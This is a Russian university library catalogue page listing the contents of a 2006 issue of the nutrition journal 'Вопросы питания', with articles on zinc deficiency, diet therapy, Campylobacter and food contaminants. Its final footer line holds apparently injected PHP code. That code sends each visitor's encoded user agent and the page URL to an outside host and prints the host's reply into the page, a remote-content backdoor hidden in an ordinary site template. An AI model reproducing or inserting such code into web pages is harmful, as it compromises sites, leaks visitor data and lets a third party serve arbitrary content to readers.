Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

280 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=FA0EA2BD-8C0A-2929-A810-459DA3086203/2006/6$")И(("Ключевые слова=Диетотерапия"))
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 1
1. 
FA0EA2BD-8C0A-2929-A810-459DA3086203/2006/6
(Нет сведений об экземплярах)
Шифр: FA0EA2BD-8C0A-2929-A810-459DA3086203/2006/6
Журнал
Вопросы питания [Текст] : науч. - практич. журн. - М., 1932 - . - 80 c. - ISSN 00428833. - Выходит раз в два месяца
2006г. N 6
Содержание:
Гмошинский, И. В. Микроэлементы в питании человека: биологические индикаторы недостаточности цинка / И. В. Гмошинский, Б. Мунхуу, В. К. Мазо. - С.4-11
Кл.слова: ЦИНК - ПИТАНИЕ
Чехонина, Ю. Г. Диетотерапия при при хроническом панкреатите / Ю. Г. Чехонина, М. М. Гаппаров, А. К. Шаховская. - С.12-17
Сравнительная оценка антиоксидантной активности фикоцианина и селенфикоцианина in vitro и ex vivo. - С.18-23
Конюхова, О. С. Результаты применения магнийсодержащих препаратов и различных нагрузочных доз витаминов В1 и В2 у добровольцев / О. С. Конюхова, Е. В. Ших, Л. И. Красных. - С.24-29
Влияние антиатерогенной диеты с применением масла амаранта на антиоксидантный и иммунный статус у больных ишемической болезнью сердца и гиперлипопротеидемией. - С.30-33
Определение флавоноидов в овощах и фруктах и принципы создания расчетной базы данных для оценки потребления флавоноидов населением. - С.34-37
Шевелева, С. А. Загразненность пищевых продуктов бактериями рода Campylobacter / С. А. Шевелева, Ж. Н. Шурышева, И. И. Пискарева. - С.38-43
Шурышева, Ж. Н. Методические подходы к изучению распространенности и количественного содержания бактерий рода Campylobacter в пищевых продуктах / Ж. Н. Шурышева, С. А. Шевелева. - С.44-50
Матисон, В. А. Особенности внедрения НАССР в систему общественного питания / В. А. Матисон, Е. В. Крюкова, Г. Ю. Шилов. - С.51-54
Кл.слова: БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТ
Сравнительная характеристика методов определения в пищевых продуктах компонентов из генно-инженерно-модифицированных организмов растительного происхождения / О. В. Анисимова, Н. А. Кашина, О. Н. Чернышева, В. А. Тутельян . - С.55-60
Кл.слова: ПРОДУКТЫ ГЕНЕТИЧЕСКИ МОДИФИЦ
Экспресс-метод оценки подлинности жировых продуктов, разработанный на основе компьютерного информационного обеспечения / Е. В. Викторова, С. Н. Кулакова, Н. А. Михайлов, М. М. Гаппаров. - С.61-66
Седова, И. Б. Изучение загрязнения продуктов детского питания фумонизинами В1 и В2 / И. Б. Седова, В. А. Тутельян. - С.67-71
Кл.слова: ПИТАНИЕ ДЕТЕЙ
Определение дегидрацетовой кислоты и ее натриевой соли в продуктах питания и полимерных оболочках. - С.72-78
Нет сведений об экземплярах
Держатели документа:
Омский экономический институт : Россия, г. Омск, пр. Комарова, 13
Оглавление 
  • Гмошинский, И. В. Микроэлементы в питании человека: биологические индикаторы недостаточности цинка / И. В. Гмошинский, Б. Мунхуу, В. К. Мазо. - с.4-11
    Кл. слова: ЦИНК - ПИТАНИЕ
  • Чехонина, Ю. Г. Диетотерапия при при хроническом панкреатите / Ю. Г. Чехонина, М. М. Гаппаров, А. К. Шаховская. - с.12-17
  • Сравнительная оценка антиоксидантной активности фикоцианина и селенфикоцианина in vitro и ex vivo. - с.18-23
  • Конюхова, О. С. Результаты применения магнийсодержащих препаратов и различных нагрузочных доз витаминов В1 и В2 у добровольцев / О. С. Конюхова, Е. В. Ших, Л. И. Красных. - с.24-29
  • Влияние антиатерогенной диеты с применением масла амаранта на антиоксидантный и иммунный статус у больных ишемической болезнью сердца и гиперлипопротеидемией. - с.30-33
  • Определение флавоноидов в овощах и фруктах и принципы создания расчетной базы данных для оценки потребления флавоноидов населением. - с.34-37
  • Шевелева, С. А. Загразненность пищевых продуктов бактериями рода Campylobacter / С. А. Шевелева, Ж. Н. Шурышева, И. И. Пискарева. - с.38-43
  • Шурышева, Ж. Н. Методические подходы к изучению распространенности и количественного содержания бактерий рода Campylobacter в пищевых продуктах / Ж. Н. Шурышева, С. А. Шевелева. - с.44-50
  • Матисон, В. А. Особенности внедрения НАССР в систему общественного питания / В. А. Матисон, Е. В. Крюкова, Г. Ю. Шилов. - с.51-54
    Кл. слова: БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТ
  • Сравнительная характеристика методов определения в пищевых продуктах компонентов из генно-инженерно-модифицированных организмов растительного происхождения / ; О. В. Анисимова, Н. А. Кашина, О. Н. Чернышева, В. А. Тутельян . - с.55-60
    Кл. слова: ПРОДУКТЫ ГЕНЕТИЧЕСКИ МОДИФИЦ
  • Экспресс-метод оценки подлинности жировых продуктов, разработанный на основе компьютерного информационного обеспечения / ; Е. В. Викторова, С. Н. Кулакова, Н. А. Михайлов, М. М. Гаппаров. - с.61-66
  • Седова, И. Б. Изучение загрязнения продуктов детского питания фумонизинами В1 и В2 / И. Б. Седова, В. А. Тутельян. - с.67-71
    Кл. слова: ПИТАНИЕ ДЕТЕЙ
  • Определение дегидрацетовой кислоты и ее натриевой соли в продуктах питания и полимерных оболочках. - с.72-78
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2808 - 16.02.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.06 с.14 запросов, 0.97c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;